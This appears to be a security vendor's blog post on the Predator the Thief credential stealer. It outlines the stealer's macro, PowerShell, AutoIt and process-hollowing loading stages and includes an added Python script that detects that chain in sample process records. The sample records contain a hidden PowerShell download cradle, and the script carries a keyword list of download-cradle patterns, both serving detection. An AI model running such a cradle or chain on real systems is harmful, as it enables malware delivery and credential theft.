Predator the Thief

January 9, 2020 Ben Cohen

Predator the Thief is a stealthy information-stealing malware family that harvests credentials and other sensitive data from infected machines: usernames, passwords, browser data and payment details.

Today, the latest versions of this malware are sold on hacking forums. To keep pace with current defenses, Predator is actively maintained and regularly receives updates and improvements. The latest version (3.3.4), released around Christmas Eve, is the stealthiest and most sophisticated to date. It includes several tricks and mechanisms that make it harder for security products to analyze and detect. Predator the Thief targets several kinds of credentials, including browser, OS and FTP client credentials, and uses numerous methods to steal them from the infected machine.

Predator the Thief spreads through phishing campaigns as a Word document, frequently one designed to look like an invoice. The first stage, a VBA macro, is embedded in the document; the stealer itself is not in the document but is fetched later, as described below.

While previous versions had a wide variety of features, this latest version adds a few loading stages that make it unique.

Predator’s loading stages:

  1. The VBA macro runs a PowerShell script.
  2. The PowerShell command downloads three files: the AutoIt3.exe interpreter, a base64-encoded AutoIt script, and the RC4-encrypted Predator the Thief payload. It then decodes the base64 script and runs it with AutoIt3.exe.
  3. The AutoIt script decrypts the payload and executes Predator using process hollowing, so the stealer runs inside what appears to be a legitimate dllhost.exe process.
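The three stages above leave a distinctive parent/child trail in process-creation telemetry: an Office application spawning PowerShell, PowerShell running a download cradle and launching AutoIt3.exe, and AutoIt3.exe spawning dllhost.exe (which on a healthy system is started by svchost.exe with a /Processid: switch). The following Python script is an added example, not code from the original post or from CyberArk, that walks Sysmon-style ProcessCreate records and flags that chain. The records, field names (pid, ppid, image, cmdline), paths and PIDs are constructed for the example; the download-cradle substrings and the dllhost.exe /Processid: heuristic are assumptions a detection engineer would tune to their own environment.

```python
"""Flag the Predator the Thief loader chain in process-creation telemetry.

Added example, not code from the original post or from CyberArk. The records
below are CONSTRUCTED to resemble Sysmon Event ID 1 (ProcessCreate) data; the
field names (pid, ppid, image, cmdline), paths and PIDs are assumptions.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings that commonly appear in PowerShell download cradles (heuristic).
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "iwr ", "start-bitstransfer", "net.webclient")

# Constructed telemetry: a benign baseline followed by the three loader stages.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 4, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k DcomLaunch"},
    # Legitimate COM surrogate: spawned by svchost.exe with a /Processid: switch.
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}"},
    {"pid": 500, "ppid": 300, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Stage 1: the invoice-themed document's VBA macro launches PowerShell.
    {"pid": 1200, "ppid": 500,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice_4471.doc"'},
    # Stage 2: PowerShell downloads AutoIt3.exe, the script and the payload.
    {"pid": 1300, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/AutoIt3.exe','C:\Users\jdoe\AppData\Local\Temp\AutoIt3.exe')"},
    {"pid": 1400, "ppid": 1300,
     "image": r"C:\Users\jdoe\AppData\Local\Temp\AutoIt3.exe",
     "cmdline": r"AutoIt3.exe C:\Users\jdoe\AppData\Local\Temp\stage2.au3"},
    # Stage 3: the AutoIt script hollows a fresh dllhost.exe to host Predator.
    {"pid": 1500, "ppid": 1400, "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe"},
]


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def ancestry(events_by_pid, pid):
    """Events from the oldest known ancestor down to pid, inclusive."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)              # guard against PID reuse creating a cycle
        chain.append(events_by_pid[pid])
        pid = events_by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def matches_loader_chain(chain):
    """True if the chain contains office -> powershell -> AutoIt3 -> dllhost
    as four consecutive parent/child links."""
    names = [basename(e["image"]) for e in chain]
    for i in range(len(names) - 3):
        if (names[i] in OFFICE_APPS and names[i + 1] == "powershell.exe"
                and names[i + 2] == "autoit3.exe" and names[i + 3] == "dllhost.exe"):
            return True
    return False


def find_findings(events):
    """Return (rule_name, pid) tuples for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        chain = ancestry(by_pid, e["pid"])
        parent = chain[-2] if len(chain) >= 2 else None
        pname = basename(parent["image"]) if parent else None
        cmd = e["cmdline"].lower()
        if name == "powershell.exe" and pname in OFFICE_APPS:
            findings.append(("office_spawns_powershell", e["pid"]))
        if name == "powershell.exe" and any(m in cmd for m in DOWNLOAD_MARKERS):
            findings.append(("powershell_download", e["pid"]))
        if name == "dllhost.exe" and pname != "svchost.exe":
            findings.append(("dllhost_unusual_parent", e["pid"]))
        if name == "dllhost.exe" and "/processid:" not in cmd:
            # Real COM surrogates carry /Processid:{CLSID}; a hollowed host
            # started with a bare command line does not (heuristic).
            findings.append(("dllhost_no_processid", e["pid"]))
        if name == "dllhost.exe" and matches_loader_chain(chain):
            findings.append(("predator_loader_chain", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in find_findings(SAMPLE_EVENTS):
        print(f"{rule:26s} pid={pid}")
```

In production telemetry, key the tree on a process GUID rather than a raw PID (PIDs are reused), and treat the process-creation chain as the visible symptom only: the hollowing itself is better confirmed with memory-oriented telemetry such as image-load and remote-thread events, or by a tool that compares the mapped image of dllhost.exe with the on-disk binary.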

So how do you defend against Predator the Thief?

CyberArk Labs tested the new version of the malware against the CyberArk Endpoint Privilege Manager and found that all of the Predator’s methods of attack were detected and blocked, which means that none of the protected credentials were stolen.

Endpoint Privilege Manager’s advanced credential theft protection capabilities can detect and block these attempts, protecting the OS, browser and other common programs’ credential stores.

Because it can protect against the fundamental nature of credential theft malware, Endpoint Privilege Manager is able to defend against sophisticated threats like Predator.

Attackers using malware like Predator are often seeking privileged credentials to enable privilege escalation and lateral movement. As such, credential theft protection should be integral to an organization’s security strategy to help protect sensitive data against modern threats and neutralize an attacker’s ability to execute their goals – including full network compromise.
